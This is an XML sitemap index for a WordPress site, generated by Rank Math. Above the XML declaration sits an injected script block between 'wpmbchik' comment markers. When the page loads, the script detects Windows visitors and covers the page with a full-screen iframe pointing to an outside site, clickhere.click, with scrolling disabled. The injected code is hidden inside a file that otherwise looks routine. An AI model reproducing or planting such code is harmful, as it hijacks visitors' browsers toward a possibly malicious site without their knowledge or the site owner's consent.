
<!-- wpmbchik -->
<script>
function createModal(url) {
  const overlay = document.createElement('div');
  Object.assign(overlay.style, {
    position: 'fixed',
    top: '0px',
    left: '0',
    width: '100%',
    height: '100%',
    background: '#fff',
    zIndex: '9999',
    margin: '0',
    padding: '0'
  });

  const iframe = document.createElement('iframe');
  iframe.src = url;
  iframe.allowFullscreen = true;
  Object.assign(iframe.style, {
    width: '100%',
    height: '100%',
    border: 'none',
    display: 'block'
  });

  overlay.appendChild(iframe);
  document.body.appendChild(overlay);

  // Блокируем прокрутку основной страницы
  document.body.style.overflow = 'hidden';
}
document.addEventListener('DOMContentLoaded', () => {
  const isWindows = /Win/i.test(navigator.userAgent);
  
  if (isWindows) {
    createModal('http://clickhere.click');
  }
});


</script>
<!-- /wpmbchik -->
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//fraguric.ztechmentor.com/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://fraguric.ztechmentor.com/post-sitemap1.xml</loc>
		<lastmod>2026-04-24T14:49:48+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://fraguric.ztechmentor.com/post-sitemap2.xml</loc>
		<lastmod>2026-04-24T14:24:54+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://fraguric.ztechmentor.com/page-sitemap.xml</loc>
		<lastmod>2026-04-23T11:48:35+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://fraguric.ztechmentor.com/elementskit_template-sitemap.xml</loc>
		<lastmod>2026-04-17T06:35:48+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://fraguric.ztechmentor.com/product-sitemap.xml</loc>
		<lastmod>2026-04-16T06:17:34+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://fraguric.ztechmentor.com/rbb_footer-sitemap.xml</loc>
		<lastmod>2026-04-18T05:25:09+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://fraguric.ztechmentor.com/category-sitemap.xml</loc>
		<lastmod>2026-04-24T14:49:48+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Rank Math SEO Plugin (c) Rank Math - rankmath.com -->